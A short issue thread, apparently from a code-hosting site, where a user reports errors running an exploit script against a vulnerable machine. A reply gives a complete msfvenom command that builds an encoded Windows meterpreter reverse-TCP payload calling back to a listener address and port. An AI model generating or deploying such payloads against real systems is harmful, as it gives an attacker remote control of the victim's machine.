Open Gromak123 opened 6 years ago
Hi Gromak123. I was having issues as well with the UTF16 check. I ended up having success using the following
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/alpha_mixed LHOST=10.10.14.6 LPORT=4444 -o payload
Hi,
Each time I try to use your script on a known vulnerable machine, I have this error :
I have built the shellcode using the command line you give in the README.md changing just the ip. Do you know how can I solve this ?
Best regards,